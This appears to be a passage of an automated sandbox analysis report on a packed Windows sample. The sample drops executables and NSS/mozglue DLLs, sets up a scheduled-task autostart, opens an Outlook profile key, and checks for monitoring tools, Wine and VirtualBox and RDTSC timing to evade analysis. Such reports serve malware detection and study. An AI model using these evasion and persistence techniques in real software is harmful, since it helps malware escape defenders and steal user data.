Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1824256 > 1048576
Source: file.exe Static PE information: Raw size of jimnplje is bigger than: 0x100000 < 0x1a3200
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2706321134.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2706693269.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2706321134.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.8d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jimnplje:EW;tazojzsu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jimnplje:EW;tazojzsu:EW;.taggant:EW;
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Unpacked PE file: 14.2.KKFBAAFCGI.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 15.2.skotes.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 16.2.skotes.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;jkwpbhob:EW;stfuboxc:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C963480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C963480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: KKFBAAFCGI.exe.0.dr Static PE information: real checksum: 0x317eee should be: 0x31f053
Source: skotes.exe.14.dr Static PE information: real checksum: 0x317eee should be: 0x31f053
Source: file.exe Static PE information: real checksum: 0x1c5823 should be: 0x1c8a4d
Source: random[1].exe.0.dr Static PE information: real checksum: 0x317eee should be: 0x31f053
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: jimnplje
Source: file.exe Static PE information: section name: tazojzsu
Source: file.exe Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: jkwpbhob
Source: random[1].exe.0.dr Static PE information: section name: stfuboxc
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name:
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: .idata
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: jkwpbhob
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: stfuboxc
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name: jkwpbhob
Source: skotes.exe.14.dr Static PE information: section name: stfuboxc
Source: skotes.exe.14.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C99B536 push ecx; ret 0_2_6C99B549
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004BD91C push ecx; ret 14_2_004BD92F
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Code function: 14_2_004B1359 push es; ret 14_2_004B135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00E6D91C push ecx; ret 15_2_00E6D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00E6D91C push ecx; ret 16_2_00E6D92F
Source: file.exe Static PE information: section name: jimnplje entropy: 7.955093016033942
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.114822789585566
Source: KKFBAAFCGI.exe.0.dr Static PE information: section name: entropy: 7.114822789585566
Source: skotes.exe.14.dr Static PE information: section name: entropy: 7.114822789585566

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\KKFBAAFCGI.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\KKFBAAFCGI.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C9C55F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Documents\KKFBAAFCGI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C983A7 second address: C983AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C983AB second address: C983C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA328DF73B0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3B46 second address: CA3B6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA32872BAE8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA32872BAECh 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3B6C second address: CA3B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73ABh 0x00000007 jmp 00007FA328DF73B7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3B96 second address: CA3B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3B9A second address: CA3B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3B9E second address: CA3BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3FE6 second address: CA3FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
